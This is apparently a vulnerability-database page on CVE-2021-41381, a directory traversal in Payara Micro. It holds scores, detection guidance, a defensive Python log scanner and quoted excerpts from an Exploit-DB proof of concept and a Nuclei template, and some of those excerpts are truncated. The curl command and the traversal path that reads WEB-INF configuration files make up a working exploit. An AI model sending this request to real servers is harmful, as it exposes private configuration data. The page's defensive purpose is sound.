CVE-2021-41381
Published 2021-09-23
Priority: P2 (69), high
CVSS 3.1 base score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Exploit: public exploit available (see Exploit-DB below)
EPSS: 52.93% (98.8th percentile)
Payara Micro Community 5.2021.6 and below allows Directory Traversal.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| payara | micro_community | <= 5.2021.6 | — |
Detection & IOCs (extracted from sources)
Command: curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties
- Detect exploitation attempts by matching HTTP GET requests containing the traversal pattern '/.//WEB-INF/' in the request URI.
- Confirm successful exploitation by checking the HTTP response body for the string 'payara.security.openid.default.providerURI=' AND 'payara.security.openid.sessionScopedConfiguration=true'.
- The traversal bypass relies on the '/./' plus double-slash sequence to evade the standard WEB-INF path protection; monitor for this pattern in access logs.
- The --path-as-is flag in curl prevents client-side path normalization; defenders should look for raw, un-normalized paths in server access logs.
- The vulnerability affects Payara Micro Community 5.2021.6 and below only; later versions are not confirmed vulnerable.
- The exploit was tested on both Linux and Windows OS environments, so detection rules should not be OS-scoped.
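The detection guidance above amounts to two checks: match the literal '/.//WEB-INF/' sequence in the raw request URI, and treat any path that only resolves into WEB-INF after normalization (the mechanism the bypass relies on) as suspicious. The following scanner is an added example, not part of this page or of any of the listed sources; it assumes Common Log Format access logs and runs over a few constructed log lines embedded in the script. It generalizes slightly beyond the page by also catching a percent-encoded form of the same sequence, since the page's own advice is to inspect the un-normalized path.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Sep/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [23/Sep/2021:10:01:05 +0000] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 200 1440
198.51.100.9 - - [23/Sep/2021:10:02:11 +0000] "GET /WEB-INF/web.xml HTTP/1.1" 404 0
198.51.100.9 - - [23/Sep/2021:10:02:15 +0000] "GET /%2e/%2fWEB-INF/web.xml HTTP/1.1" 200 900
"""

# Minimal CLF parser: client IP, timestamp, method, raw request URI, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Literal traversal sequence named in the advisory, matched on the raw URI.
RAW_PATTERN = "/.//WEB-INF/"


def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    # Work on the path only (drop query string), percent-decode it, then
    # collapse '/./' and '//' the way a filesystem or servlet container would.
    decoded = unquote(urlsplit(uri).path)
    normalized = posixpath.normpath(decoded)

    reasons = []
    if RAW_PATTERN in uri:
        reasons.append("raw traversal pattern '/.//WEB-INF/' in request URI")
    if decoded.upper().startswith("/WEB-INF/"):
        reasons.append("direct request for a WEB-INF resource")
    elif "/WEB-INF/" in normalized.upper():
        # The path reaches WEB-INF only after normalization: this is the
        # shape of the bypass, whether or not it used the exact literal above.
        reasons.append("path resolves into WEB-INF only after normalization")
    if not reasons:
        return None

    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "uri": uri,
        "normalized_path": normalized,
        "status": status,
        # A 200 on such a request is the first sign the protection was bypassed;
        # the page's response-body check is the confirming step.
        "likely_success": status == 200,
        "reasons": reasons,
    }


def scan_log(text):
    """Scan a block of access-log text and return all findings in order."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        flag = "LIKELY SUCCESS" if finding["likely_success"] else "attempt"
        print(f"{finding['ip']} {finding['uri']} -> {flag}: {'; '.join(finding['reasons'])}")
```

Feed real logs to `scan_log` via stdin or a file and treat `likely_success` hits as the ones to triage first; the lines with a 404 still show who is probing, which is useful for blocking and for correlating with later successful requests from the same source.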
CVSS provenance
NVD v3.1: 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
NVD v2.0: 4.3 MEDIUM, AV:N/AC:M/Au:N/C:P/I:N/A:N
No detection rules found.
Exploit-DB
Payara Micro Community 5.2021.6 - Directory Traversal (exploitdb · 2021-10-04 · CVSS 7.5, HIGH)
---
# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
Proof of Concept:
Step 1: Open the browser and check the version of the Payara software.
Step 2: Add this path at the end of the URL:
/.//WEB-INF/classes/META-INF/microprofile-config.properties
Step 3: Check that the response contains
"payara.security.openid.default.providerU
Nuclei
Payara Micro Community 5.2021.6 Directory Traversal (nuclei · CVSS 7.5, HIGH)
Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
Template:
id: CVE-2021-41381

info:
  name: Payara Micro Community 5.2021.6 Directory Traversal
  author: pikpikcu
  severity: high
  description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
  impact: |
    An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
  remediation: |
    Upgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability.
  reference:
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
    - https://nvd.nist.gov/vuln/detail/C
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/164365/Payara-Micro-Community-5.2021.6-Directory-Traversal.html
- http://packetstormsecurity.com/files/169864/Payara-Platform-Path-Traversal.html
- http://seclists.org/fulldisclosure/2022/Nov/11
- https://github.com/Net-hunter121/CVE-2021-41381/blob/main/CVE:%202021-41381-POC
- https://www.exploit-db.com/exploits/50371
- https://www.payara.fish
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt